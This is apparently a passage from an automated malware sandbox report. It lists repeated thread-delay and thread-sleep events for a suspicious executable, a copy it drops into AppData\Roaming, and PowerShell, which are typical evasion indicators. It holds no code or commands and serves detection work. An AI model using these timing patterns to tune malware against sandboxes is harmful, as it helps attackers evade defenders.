Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594894	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597883
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596862
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596511
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596405
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595645
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595528
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595280
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595170
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594722
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594265

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7630	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1844	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7562	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1933	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Window / User API: threadDelayed 2012	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Window / User API: threadDelayed 7847	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Window / User API: threadDelayed 2748
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Window / User API: threadDelayed 7104

Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4916	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4368	Thread sleep count: 7562 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4368	Thread sleep count: 1933 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5044	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3880	Thread sleep count: 2012 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3880	Thread sleep count: 7847 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598658s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -594894s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe TID: 3560	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 5472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6612	Thread sleep count: 2748 > 30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6612	Thread sleep count: 7104 > 30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597883s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596862s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596511s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596405s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596297s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -596077s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595645s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595528s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595280s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595170s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594722s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594594s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594375s >= -30000s
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe TID: 6916	Thread sleep time: -594265s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598658	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594894	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597883
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596862
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596511
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596405
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595645
